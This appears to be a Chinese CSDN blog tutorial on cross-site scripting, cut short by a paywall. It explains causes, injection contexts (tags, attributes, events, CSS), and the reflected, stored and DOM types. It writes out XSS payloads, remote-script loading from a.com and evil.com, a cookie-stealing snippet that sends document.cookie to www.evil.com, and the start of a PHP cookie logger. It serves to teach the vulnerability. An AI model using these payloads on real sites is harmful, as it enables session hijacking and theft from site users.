xss(跨站脚本攻击)详解

最新推荐文章于 2024-06-17 10:15:54 发布
最新推荐文章于 2024-06-17 10:15:54 发布
阅读量5.4k 收藏 40
点赞数 3
分类专栏: web漏洞 文章标签: xss javascript json flash 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45551083/article/details/106956045
版权

文章目录

1. xss简介

1.1 概念

​ 跨站脚本攻击,英文全称Cross Site Script.

​ xss攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本.从而在用户浏览网页时,控制用户浏览器的一种攻击.

1.2 成因

​ 网站对用户的输入不加以处理,直接输入到页面,就有可能造成xss.

​ 比如下例:

<?php
	$input = $_GET['parm'];
	echo $input;
?>

​ 若用户输入<script> alert("xss");</script> 就可以在页面弹窗

常见场景

  • 标签内的xss <div>${Xss}<div/>

  • 属性里面的xss<div class="${XSS}"></div> <a href="${xss}"><a>

  • 事件中的xss<img src=x onerror="${xss}">

  • css里面的xss

    <style type="text/css">
    body{
     background-image:url(${xss});}
</style>
${
     xss}:javascript:alert(/xss/)

    <div style="background-image:url(javascript:alert('XSS'))">

    <style>
  body {
     background-image: url("javascript:alert('XSS')");}
</style>

    IE5及其以后版本支持在CSS中使用expression,使用expression同样可以触发XSS漏洞:

    <div style="width: expression(alert('XSS'));">

    <img src="#" style="xss:expression(alert(/XSS/));">
<style>
  body {
     background-image: expression(alert("XSS"));}
</style>

    <div style="list-style-image:url(javascript:alert('XSS'))">
<img style="background-image: url(javascript:alert('XSS'))">

    @import和link方式都可以轻松地导入外部含有XSS代码的样式表文件:

    <link rel="stylesheet" href="http://www.evil.com/attack.css">
<style type='text/css'>@import url(http://www.evil.com/xss.css);</style>

    @import还有一个特性,就是能直接执行JavaScript代码:

    <style> @import 'javascript:alert("XSS")';</style>

  • Script标签

    <script>
    var username = "$username";
</script>
$username=1" alert(/xss/);//

  • <input name="1" value="" > 输入的单引号/双引号被转义 标签内进行突破

    oninput=alert(1) //

    onchange=alert(1)//

1.3分类

​ xss根据效果不同,分成以下几类

  • 反射型xss

    用户的输入,最终会由浏览器反馈给用户

    http://www.test.com?xs=<script>alert("1");</script>

    后端页面:

    <?php
	$input = $_GET['xs'];
	echo $input;
?>

    数据由服务端处理,传回来,最终又反馈到浏览器

    反射型xss利用通常需要黑客诱导用户点击恶意链接等.

  • 储存型xss

    储存型xss会把用户输入的数据储存到服务端.任何别的用户若访问了带有储存型xss恶意脚本的资源,都会受到侵害.

    比较常见的场景: 黑客写下一篇带有恶意JavaScript代码的博客文章,评论,留言.

    所以访问该文章,评论,留言的用户,浏览器都会执行这段恶意代码

  • Dom型xss

    Dom型xss效果与反射型xss类似.成因比较特别.不经过服务端处理,而是由前端的js脚本将用户输入插入到页面

    比如:

    <script>
    function test()(
		var str = document.getElementById("text").value;
		document.getElementById("x").innerHTML = str;
	)
</script>

<html>
    <input type="text" id="text" value=""/>
    <div id="x">
        a
    </div>
</html>

2.xss攻击

2.1 利用方式

  • 通过xss加载恶意代码

http://www.test.com?xss=<script src=http://www.a.com/1.js></script>

  • xss窃取cookie

    var img = document.createElement("img");
imr.src = "http://www.evil.com?"+escape(document.cookie);
<!--escape对字符进行编码-->
document.body.appendChild(img);

    这段代码在请求资源时,会携带编码后的cookie进行请求,审查evil.com的日志即可查看到cookie

    也可以在服务器接收

    <?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log)
最低0.47元/天 解锁文章
lonmar~
关注
  • 3
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XSS跨站脚本注入详解
qq_38634483的博客
02-24 1066
XSS(Cross-site scripting)注入是一种Web安全漏洞,它允许攻击者在受害者的浏览器上执行恶意脚本,从而导致攻击者能够窃取受害者的敏感信息或者利用受害者的身份在应用程序上执行未经授权的操作。
SpringBoot解决XSS跨站脚本攻击
实战架构师
07-31 1017
文章目录一.思路二.实现2.1 定义XssHttpServletRequestWrapper2.2 定义XssFilter类实现Filter接口2.3 Filter配置2.4 yaml配置 一.思路 1.定义XssHttpServletRequestWrapper类继承HttpServletRequestWrapper覆写getParameterValues,getInputStream方法 request的inputStream只能被读取一次,多次读取将报错; 解决方案:通过构造方法先记录已读取的内容,然
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
数据知道的博客
08-29 3万+
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS(Cross Site Scripting)跨站脚本攻击,是一种网站应用程序的安全漏洞攻击XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。...
XSS跨站脚本攻击详解
jkzyx123的博客
07-12 9458
XSS是一种常见的安全漏洞,它允许攻击者在受害者浏览器上执行恶意脚本攻击者通过在网页中注入恶意代码,使得用户浏览该页面时,恶意代码会被执行。
XSS、CSRF、点击劫持、web应用安全实施
最新发布
zzz6583zz的博客
06-17 421
如果放cookie要配置上httponly和secure属性,这样就防止了xss,同时其他的同源策略要多多考虑。如果选择其他方式,就要着重考虑防止xss。必须使用csrf-token,使用cookie存储,使用httponly和secure属性。每个域名入口必须配置指定域能跨域,不能写通配符。响应的html内容必须加上csp策略(响应头和meta标签形式均可),只允许本源或指定源,配置不允许内联脚本、内联css。
XSS跨站脚本攻击详解以及复现gallerycms字符长度限制短域名绕过
qq_31088019的博客
07-25 1694
xss详解以及利用短字符缩短字符长度进行短域名绕过
XSS跨站脚本攻击(基础详解)
cike_y
01-10 3031
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
详解XSS跨站脚本攻击原理及防御
杜小白的博客
04-21 7606
一、XSS跨站脚本攻击跨站脚本攻击,英文全称是Cross Site Script,本来缩写是CSS,但是为了和层叠样式表CSS有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“s跨站脚本”。但是发展到今天,由于javascript的强大功能以...
XSS-跨站脚本攻击 漏洞详解
m0_69043895的博客
04-20 1435
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
XSS跨站脚本攻击(DVWA XSS攻击详解XSS平台搭建)
tmzy1的博客
03-20 2025
XSS攻击XSS平台搭建
XSS(跨站脚本攻击)详解
热门推荐
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
xss跨站脚本攻击详解
06-08
该文档主要说明了一些简单的xxs(跨站脚本攻击)简介,分类,构造,以及解决办法
xss跨站脚本攻击与预防
11-04
**XSS跨站脚本攻击详解** XSS(Cross Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息或者操控用户的行为。这种攻击主要发生在Web应用中,攻击...
XSS跨站脚本攻击课件
11-24
XSS跨站脚本攻击详解 XSS(Cross-Site Scripting)跨站脚本攻击是网络攻防领域中的常见威胁,攻击者利用这种技术向网页中注入恶意脚本,进而对用户的信息安全构成严重风险。由于浏览器通常无法区分合法与恶意...
XSS跨站脚本攻击
04-25
### XSS跨站脚本攻击详解 #### 一、XSS跨站脚本攻击概述 XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web应用安全威胁,其核心在于利用网站对用户输入数据的处理不当,允许攻击者注入恶意脚本到网页中,...
跨站攻击(XSS+CSRF).docx
01-05
XSS攻击详解XSS(Cross Site Scripting)攻击是指攻击者通过在网页中插入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而达到窃取用户信息、操纵用户行为等目的。XSS攻击主要分为三种类型: 1. 反射型...
XML 相关漏洞
lonmar的博客
07-29 3355
文章目录XML基础基础一个XML示例:XML的格式XML的属性DTD实体(1) 内部实体声明(2) 外部实体声明(3) 参数实体XML注入原理防御XXE注入漏洞介绍XXE类型有回显的本地文件读取读取文件CDATA无回显本地文件读取XXE的其他攻击方式通过XXE漏洞进行内网探测内网主机端口探测:通过XXE漏洞进行命令执行通过XXE漏洞进行DOS攻击XXE的防御:其他资源 XML基础 基础 https://www.cnblogs.com/l0nmar/p/13337996.html 一个XML示例: <?
原型链污染漏洞(一)
lonmar的博客
11-09 2288
文章目录0x01 深入了解JavaScript对象与类0x02 什么是原型链污染0x03 哪些情况下原型链会被污染1. 最显然的情况2.利用某些API来进行攻击3. 找出易受攻击的API0x04 Attacking1. 拒绝服务2. for循环污染3. 属性注入0x05 针对Prototype pollution的防御1. 原型冻结2. Schema validation of JSON input3. 使用MAP代替Object4.Object.create(null) 0x01 深入了解JavaScri
XSS跨站脚本攻击详解与防御策略
"该资源主要介绍了XSS跨站脚本攻击的相关知识,包括攻击的定义、类型、漏洞挖掘以及防范措施。此外,还探讨了Web安全的三个主要目标:保护Web服务器及其数据的安全、保护信息传递的安全以及保护终端用户设备的安全。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值